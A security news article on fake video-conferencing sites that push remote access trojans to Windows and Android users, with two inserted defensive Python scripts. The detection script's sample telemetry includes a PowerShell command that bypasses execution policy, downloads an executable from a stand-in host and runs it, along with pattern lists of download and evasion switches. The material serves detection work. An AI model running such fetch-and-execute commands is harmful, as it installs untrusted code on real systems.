Bad actors are using fake Zoom, Microsoft’s Skype and Google Meet websites to distribute malware.
As discovered by Zscaler ThreatLabz researchers, threat actors have been impersonating video conferencing brands to spread various malware targeting both Android and Windows users since December 2023.
The spoofed sites are written in Russian and hosted on URLs that closely resemble the legitimate ones, a “typosquatting” tactic: a user who does not notice the altered domain believes they have reached the real website and downloads the malware.
Zscaler ThreatLabz wrote:
“The attacker utilized shared web hosting, hosting all these fake online meeting sites on a single IP address. All of the fake sites were in Russian(…) In addition, the attackers hosted these fake sites using URLs that closely resembled the actual websites.”
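A simple way to catch look-alike domains of the kind described above is to compare each candidate hostname against the brand domains being impersonated, after folding common character substitutions. The script below is an added example, not code from Zscaler or from this article: the brand domains are the real ones, but every candidate domain in it is constructed for illustration and is not an indicator from the campaign, and the homoglyph list and the 0.8 threshold are assumptions to tune.

```python
"""Score candidate domains against the video-conferencing brands the lures impersonate.

Added example, not part of the Zscaler report: the brand domains are the real ones,
but every candidate domain below is constructed for illustration and is not an
indicator from the campaign.
"""
from difflib import SequenceMatcher

# Legitimate registrable domains and the brand label a squat would try to mimic.
BRANDS = {
    "zoom.us": "zoom",
    "skype.com": "skype",
    "meet.google.com": "google",
}

# Character substitutions commonly used in typosquats; folding them lets
# "zoorn.us" compare as "zoom.us". The list is an assumption, extend as needed.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def canonical_host(domain: str) -> str:
    """Lower-case the hostname and drop a leading 'www.' and trailing dot."""
    host = domain.strip().lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def fold_homoglyphs(host: str) -> str:
    for lookalike, letter in HOMOGLYPHS:
        host = host.replace(lookalike, letter)
    return host


def second_level_label(host: str) -> str:
    labels = host.split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def classify(domain: str, threshold: float = 0.8):
    """Return (verdict, closest_brand, score).

    verdict is "legitimate" for a brand domain or one of its subdomains,
    "suspicious" when the folded hostname or its second-level label is close to
    a brand (or embeds the brand label), and "unrelated" otherwise.
    """
    host = canonical_host(domain)
    # Exact-domain and subdomain checks run on the unfolded name, so that a
    # homoglyph squat is never mistaken for the real site.
    for brand in BRANDS:
        if host == brand or host.endswith("." + brand):
            return ("legitimate", brand, 1.0)

    folded = fold_homoglyphs(host)
    sld = second_level_label(folded)
    best = ("unrelated", None, 0.0)
    for brand, label in BRANDS.items():
        score = max(
            SequenceMatcher(None, folded, brand).ratio(),
            SequenceMatcher(None, sld, label).ratio(),
        )
        # A brand label embedded in a foreign domain (e.g. skype-download.com)
        # is treated as at least threshold-level suspicious.
        if label in folded:
            score = max(score, threshold)
        if score > best[2]:
            verdict = "suspicious" if score >= threshold else "unrelated"
            best = (verdict, brand, round(score, 3))
    return best


if __name__ == "__main__":
    # Constructed candidates, not campaign indicators.
    for candidate in ["zoom.us", "us04web.zoom.us", "zoorn.us", "skype-download.com", "example.org"]:
        print(candidate, classify(candidate))
```

Run it over newly registered domains or proxy logs; the "legitimate" check deliberately uses the unfolded hostname so that a homoglyph squat such as zoorn.us is scored as suspicious rather than accepted as zoom.us.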
The websites offer download buttons for Android, iOS and Windows. The iOS link does nothing malicious; the Android button downloads an APK file, and the Windows button triggers the download of a batch script.
The batch script launches a PowerShell script that downloads and runs one of the Windows remote access trojans (RATs) identified in the campaign, NjRAT or DCRat, while the Android APK delivers SpyNote RAT.
“The threat actor is distributing RATs, including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems,” Zscaler added. “A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files.”
In each case the RAT gives the operator the ability to extract files, steal sensitive information and log keystrokes.
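The Windows side of the chain (a batch file run from the browser's download folder, which then spawns PowerShell to fetch and execute a payload) is visible in ordinary process-creation telemetry. The detection logic below is an added example, not code from Zscaler or from this article. The events are constructed Sysmon-style (Event ID 1) records, the URL uses the reserved example.invalid host, and the command-line indicators are this editor's assumptions about what such a chain typically looks like, not the campaign's actual command lines.

```python
"""Flag a batch-script-to-PowerShell download chain in process-creation telemetry.

Added example, not code from the Zscaler report. The events are constructed
Sysmon-style (Event ID 1) records, and the indicator lists are assumptions
about typical tradecraft, not the campaign's actual command lines.
"""
import re

# PowerShell primitives that fetch or execute remote content (assumed indicators).
DOWNLOAD_PRIMITIVES = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|net\.webclient|downloadfile|"
    r"downloadstring|start-bitstransfer|invoke-expression|\biex\b",
    re.IGNORECASE,
)

# Switches that suppress profile, policy or window; often paired with the above.
EVASION_FLAGS = re.compile(
    r"-(?:ep|executionpolicy)\s+bypass|-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|"
    r"-enc(?:odedcommand)?\b",
    re.IGNORECASE,
)

# A .bat/.cmd launched from the user's Downloads folder, as the Windows lure does.
BATCH_IN_DOWNLOADS = re.compile(r"\\downloads\\[^\s\"]*\.(?:bat|cmd)\b", re.IGNORECASE)


def powershell_download_chain(event: dict) -> bool:
    """PowerShell spawned by cmd.exe (a batch script) that pulls content from the network."""
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    return (
        image.endswith(("powershell.exe", "pwsh.exe"))
        and parent.endswith("cmd.exe")
        and DOWNLOAD_PRIMITIVES.search(event["CommandLine"]) is not None
    )


def batch_from_downloads(event: dict) -> bool:
    """cmd.exe executing a batch file straight out of the Downloads folder."""
    return (
        event["Image"].lower().endswith("cmd.exe")
        and BATCH_IN_DOWNLOADS.search(event["CommandLine"]) is not None
    )


RULES = {
    "powershell_download_chain": powershell_download_chain,
    "batch_from_downloads": batch_from_downloads,
}


def scan(events):
    """Return one hit per (event, rule) match, with any evasion switches seen."""
    hits = []
    for index, event in enumerate(events):
        for name, rule in RULES.items():
            if rule(event):
                flags = [m.group(0) for m in EVASION_FLAGS.finditer(event["CommandLine"])]
                hits.append({"index": index, "rule": name, "evasion_flags": flags,
                             "command_line": event["CommandLine"]})
    return hits


# Constructed sample telemetry (not real campaign data).
SAMPLE_EVENTS = [
    {   # user double-clicks the downloaded "installer"
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": r'cmd.exe /c "C:\Users\alice\Downloads\Skype-Setup.bat"',
    },
    {   # the batch script hands off to PowerShell to fetch and run the payload
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'powershell.exe -ep bypass -w hidden -c "iwr http://example.invalid/update.exe -OutFile $env:TEMP\update.exe; Start-Process $env:TEMP\update.exe"',
    },
    {   # benign: a scheduled batch job runs a maintenance script
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    },
    {   # benign: interactive PowerShell started from Explorer
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe",
    },
]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["index"], hit["rule"], hit["evasion_flags"])
```

The chain rule deliberately requires both the cmd.exe parent and a download primitive: cmd-launched PowerShell alone (the third event) is routine on managed hosts, and the evasion switches are reported as supporting context rather than used as a trigger, since they also appear in legitimate automation.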
Businesses Prioritising Security in 2024
The security challenges created by the rise of hybrid working, together with increasingly sophisticated attacker tooling and tactics, have produced several alarming stories in recent months.
Over the winter holidays, Microsoft had to disable the ms-appinstaller protocol handler to stop it being abused for malware delivery, while Teams was also being exploited for malware phishing.
The tech giant disabled the protocol handler by default after finding evidence that attackers were exploiting it to distribute malware. Microsoft indicated that attackers likely chose this vector because it could bypass security mechanisms such as Microsoft Defender SmartScreen and the browser warnings normally shown for executable downloads, leaving users exposed.
Both Teams and Skype were also targeted in earlier attacks in the autumn, when compromised Skype accounts were used to spread the DarkGate malware.
As reported by Trend Micro, multiple Skype business accounts were compromised and then used to distribute a VBA loader script attachment. How the accounts were compromised is unconfirmed, but Trend Micro suggested it was “either through leaked credentials available through underground forums or the previous compromise of the parent organisation”.
Skype was not the only channel; Teams was targeted as well. The attackers sought to reach Teams accounts at organisations whose configuration allows messages from external users.
These developments over the past few months have prompted vendors to strengthen their security offerings. Cisco, for example, unveiled a “first-of-its-kind” Identity Intelligence solution last month. The service sits within the Cisco Security Cloud and is complemented by several new AI-powered security capabilities.
Cisco Identity Intelligence layers unified visibility and AI-driven analytics on top of a customer’s existing identity infrastructure. It lets teams see their entire identity population, secure vulnerable accounts, revoke unused and risky privileges, spot behavioural anomalies and block high-risk access attempts. Critically, this is done without replacing the solutions already in place, so integration does not require an overhaul.